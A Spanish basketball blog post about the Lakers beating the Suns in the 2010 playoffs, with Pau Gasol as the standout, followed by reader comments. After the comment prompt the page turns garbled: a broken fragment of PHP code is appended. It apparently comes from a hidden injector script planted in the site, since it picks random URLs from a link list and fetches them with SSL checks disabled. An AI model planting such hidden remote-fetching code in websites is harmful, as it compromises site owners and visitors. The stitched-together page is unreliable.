Playoffs 2009/2010: Lucky boys

20 de May de 2010 por TheDeerHunter

252 puntitos en estos dos partidos. Casi un 60% en tiros de campo como también en triples. No es de extrañar que la sesuda capacidad analítica de Amaré Stoudemire concluya que la causa de todo esto sea simplemente la “potra” de los amarillos.

Convendremos con él que es una suerte para Lakers tener a Pau Gasol con ellos. El Gasol que demuestra su sensatez cada vez que abre la boca: “Sólo intento jugar al máximo. No presto atención a los mensajes ni intento mandarlos.” El mismo por el que el triángulo ofensivo fluye hacia sus compañeros como su propia sangre por las venas. El que se arremanga a defender para que no le endosen día sí y día también los 130 puntos sin llegar a saber desde donde le llueven las canastas. El jugador que si las circunstancias y su equipo lo requieren ejecuta y mata como cualquier primer espada de la liga pero que sus virtudes trascienden todas esas consideraciones. Alguno podría concluir que, tras la nueva muestra que nos ofreció anoche, lo que es algo más que suerte es que la liga le tenga a Amaré en tan altísima consideración habiendo un jugador como Gasol por medio.

Es una suerte tener un anotador estrella que llegado el momento sea capaz de dejar de ser lo que su propia naturaleza le exije por el bien del grupo que lidera. Los ecos del pasado nos vienen a la mente a algunos cuando anoche lo que tocaba ante las defensas dobles que le colocó Gentry era dar el balón a sus compañeros. Todavía nos suena la cantinela del precedente, cuando algunos medios llegaron a acusarle de dejarse perder a conciencia por hacer exáctamente lo mismo. La diferencia está que anoche los Artest, Farmar, Brown o Fisher y el resto de compañeros las enchufaron como tocaba. El resultado es que asistimos a la mejor marca de asistencias en playoffs de los Lakers desde Magic Johnson. Se dice pronto. Una auténtica suerte, ¿no?

Y por último es una suerte contar con Odom. Muchas veces criticado y con razón, pero que es el mejor sexto hombre que hay en la liga en activo durante los playoffs. Ayer, por si quedaba alguna duda de que fue coña lo del primer partido de la serie, volvió a desmarcarse con un nuevo doble-doble, aliñado con todo tipo de acciones defensivas y ofensivas que siempre logran levantar al público del Staples de sus asientos.

Debe de ser frustrante para los Suns. No es muy normal que Hill, Richardson, Dudley se marquen un partidazo como el de ayer y que a lo más que lleguen es a aguantar vivos 3 cuartos. Ya avisamos tras el primer partido que tienen muchos fuegos, además de controlar a Kobe, que deben apagar. No tenemos tan claro si uno de ellos, como asegura Amaré, es simplemente la suerte.

PREMIOS

MVP: 29 puntos, 9 rebotes, 5 asistencias con 14 puntos en el último y definitivo cuarto del partido. Hablamos de Pau Gasol, obviamente.

Sorpresa: Para mí ver un partido con Lamar Odom y Ron Artest por encima de los 17 puntos ya es una auténtica sorpresa. Y si estos dos funcionan los Lakers son casi invencibles.

Decepción: El arma secreta de los Suns, Channing Frye, ese pívot capaz de tirar triples como un alero, cuajó su peor partido de todos los Playoffs. Se quedó sin anotar en los 9 minutos que estuvo en pista. Eso sí, le dio tiempo de tirarse 5 piedras.

Esfuerzo en vano: La pareja Grant Hill-Jason Richardson sacó lo mejor de sí misma para empatar el partido al final de tercer cuarto. Entre los 2 anotaron 26 puntos en ese período y 50 puntos en total.

Comenta

12 comentarios a esta entrada

  1. PIRATA dice:
    #1

    Increible como Kobe asistia a Pau en el ultimo cuarto exigiendo aclarados para él, se merendó a Amare.

      Citar

  2. Albertis dice:
    #2

    Bueno, qué decir… plantillón de los amarillos, Gasol es E.T, un 7 pies que asiste mejor que nadie, define, defiende, intimida, lo que haga falta vaya (no puede ser que este hombre tire menos de 15 veces a canasta, tendría que ser una condición “sin ecuanon”). Me gustó ayer Bynum, no jugó mucho pero el tiempo que estuvo lo hizo bien; me encanta ver estos partidos donde Kobe elige la mejor opción, es decir, asistir con criterio y no se ofusca en el tiro. Se me presumen indispensables Odom y Artest si la final es con los Celtics y cada día me gusta más la pinta que tiene muñequita linda Brown! porque no pensaba que tuviera tan buena mano!
    Aún y asi, espero que ganen los Celtics…
    Celtic’s Pride!!!

      Citar

  3. Sr. Lagarto dice:
    #3

    Felicitaciones TheDeerHunter por la excelente crónica de hoy. Algunas crónicas de periódicos de tirada nacional son indudablemente inferiores en calidad a la tuya.

    Un saludo a todos los seguidores del blog.

    Lagarto.

      Citar

  4. sergio dice:
    #4

    Lo que más me puede preocupar de esta serie es que los Suns no son en absoluto un buen “sparring” para prepararse para los Celtics. Demasiado cambio de sistema y agresividad en el juego. Tendrán que cambiar el “chip” de forma tajante. Nadie cree que los Lakers van a mantener estos porcentajes y esta armonía en el juego ante un equipo como Boston (u Orlando.. demosle el beneficio de la duda). De hecho, los anillos los ganaran en LA ante equipos defensivos.

      Citar

  5. kantonyo dice:
    #5

    Me encanta una final BOSTON-LAKERS. Oportunidad de revancha o de acabar con la moral de los angelinos.

      Citar

  6. Love Denise dice:
    #6

    se qué es dificil remontar, pero…¿por qué dais por muertos a Phoenix y a Orlando?

      Citar

  7. UnderlocK dice:
    #7

    Sobre todo por las sensaciones que han dado en cada partido tanto LA como Boston, ademas en el caso de Orlando remontar una eliminatoria en el Garden es casi imposible, repito, sobre todo por las sensaciones que se han visto en los primeros partidos.

      Citar

  8. Txusma dice:
    #8

    Hombre, Orlando ha perdido sus 2 partidos en casa… Alguien ha remontado eso alguna vez? Y no parece que los Magic vayan a ser los primeros en hacerlo.

      Citar

  9. TheDeerHunter dice:
    #9

    A los Celtics desde luego que no se los ha remontado nadie en toda la historia de la liga.
    Lo de los Lakers, en efecto, es distinto. En efecto son sensaciones. Diría que todavía queda tela que cortar, aunque ahora mismo la presión es mucha para Suns.

      Citar

  10. Love Denise dice:
    #10

    Si me permitis un apunte de ACB. Que desastre de Madrid y que mal entrenador es Messina (sí, por muchos titulos que tenga), ya me gustaría qué era capaz de hacer en un equipo de media tabla

      Citar

  11. MagicJohnson32 dice:
    #11

    Deer, yo también pensaba mientras veía el partido “Joer, qué suerte… ser tan buenos”. Pero sobre todo pensaba “…y qué suerte que Amaré sea una madre en defensa”, jeje.

    Imagino que en Phoenix los partidos serán más equilibrados. Porque ayer, por mucho que llegasen empatados al último cuarto, el dominio fue de los Lakers siempre. Y cuando hizo falta, pasaron por encima de los Suns. Genial el último cuarto, con continuos aclarados a Pau. Hizo lo que quiso con Stoudemire.

      Citar

  12. TheDeerHunter dice:
    #12

    Amare es un tío con un físico portentoso. ¿Cómo es posible que sea tan poco determinante defensivamente?
    ¿Siempre ha defendido así de mal o tiene que ver con las famosas lesiones?
    Hace mucho tiempo yo tenía otra opinión de él, desde luego.

    Lo que queda muy claro es que a quien se le ocurra ponerlo por delante de Gasol en esta liga es para darle con un mazo en el cabezo. No tienen ni punto de comparación.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>